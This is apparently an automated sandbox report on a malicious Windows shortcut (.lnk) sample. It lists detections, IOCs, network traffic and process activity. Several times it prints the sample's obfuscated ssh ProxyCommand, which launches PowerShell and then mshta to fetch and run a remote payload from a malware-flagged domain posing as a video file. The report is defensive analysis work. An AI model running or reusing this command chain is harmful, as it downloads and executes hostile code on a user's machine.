Edit tour

Windows Analysis Report
anov3mrRa1.lnk

Overview

General Information

Sample name:	anov3mrRa1.lnk renamed because original name is a hash value
Original sample name:	601862f43afd9315c5216580679745a3.lnk
Analysis ID:	1604925
MD5:	601862f43afd9315c5216580679745a3
SHA1:	23babb893510faecdd8df07a4a71e683ead6164a
SHA256:	320f2c9ac23ec442f13293da99e423c0bbe1c2229e7febb6a94afabab66e052f
Tags:	lnkuser-abuse_ch
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Joe Sandbox ML detected suspicious sample

Sigma detected: Potentially Suspicious PowerShell Child Processes

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Lolbin Ssh.exe Use As Proxy

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

ssh.exe (PID: 5748 cmdline: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" . MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)

conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2036 cmdline: powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4') MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4" MD5: 04029E121A0CFA5991749937DD22A1D9)

mshta.exe (PID: 6788 cmdline: "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cleanup

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2672, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4, ProcessId: 6788, ProcessName: mshta.exe

Sigma detected: Lolbin Ssh.exe Use As Proxy

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" ., ProcessId: 5748, ProcessName: ssh.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4'), CommandLine: powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 5748, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4'), ProcessId: 2036, ProcessName: powershell.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:43:43.502205+0100	1810000	2	Potentially Bad Traffic	192.168.2.8	62696	185.208.156.80	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://docshare.icu/w	Avira URL Cloud: Label: malware
Source: https://docshare.icu/G	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4m	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...a	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4V	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4p	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4k	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp48D	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4o	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4https://docshare.ic	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4$global:?	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4z	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4A	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4t	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/ImportantInformation.pdf	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4dG	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4H	Avira URL Cloud: Label: malware
Source: https://docshare.icu/tem	Avira URL Cloud: Label: malware
Source: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4C:	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: anov3mrRa1.lnk	Virustotal: Detection: 36%			Perma Link
Source: anov3mrRa1.lnk	ReversingLabs: Detection: 34%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.4% probability

Source: unknown	HTTPS traffic detected: 185.208.156.80:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.208.156.80:443 -> 192.168.2.8:62696 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.8:62425 -> 162.159.36.2:53

Source: Joe Sandbox View

ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:62696 -> 185.208.156.80:443

Source: global traffic	HTTP traffic detected: GET /templates/imagesoftware/mediathek/videoanimationfloating.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docshare.icuConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /templates/imagesoftware/ImportantInformation.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docshare.icuConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /templates/imagesoftware/mediathek/videoanimationfloating.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docshare.icuConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /templates/imagesoftware/ImportantInformation.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docshare.icuConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: docshare.icu
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa

Source: powershell.exe, 00000004.00000002.1585794335.0000020A80025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1585794335.0000020A80025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000004.00000002.1585794335.0000020A8006E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BE23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/G
Source: ssh.exe, 00000000.00000002.2817656658.000002CF6CAA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/tem
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BD85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2817910967.000001F35BDFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2818252625.000001F35D7D0000.00000004.00000800.00020000.00000000.sdmp, anov3mrRa1.lnk	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4
Source: powershell.exe	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4$global:?
Source: mshta.exe, 00000005.00000002.2819281620.000001FB5E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...
Source: mshta.exe, 00000005.00000002.2819281620.000001FB5E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...a
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp48D
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4A
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BD60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2817910967.000001F35BE42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4C:
Source: powershell.exe, 00000004.00000002.1589193192.0000020AF9310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4H
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BD85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4O
Source: powershell.exe, 00000004.00000002.1588818359.0000020AF9082000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4V
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4dG
Source: mshta.exe, 00000005.00000002.2819830654.000001FB5EDC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4https://docshare.ic
Source: powershell.exe, 00000004.00000002.1589911445.0000020AFB090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4k
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4m
Source: powershell.exe, 00000004.00000002.1589337260.0000020AFAA10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4o
Source: powershell.exe, 00000004.00000002.1585794335.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4p
Source: powershell.exe, 00000004.00000002.1589911445.0000020AFB090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4t
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BD85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4z
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BE23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docshare.icu/w
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BE23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62696

Source: unknown	HTTPS traffic detected: 185.208.156.80:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.208.156.80:443 -> 192.168.2.8:62696 version: TLS 1.2

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: anov3mrRa1.lnk

LNK file: -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" .

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal76.winLNK@8/6@3/1

Source: C:\Windows\System32\OpenSSH\ssh.exe

File created: C:\Users\user\.ssh

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqvo15zq.xu5.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: anov3mrRa1.lnk	Virustotal: Detection: 36%
Source: anov3mrRa1.lnk	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" .
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
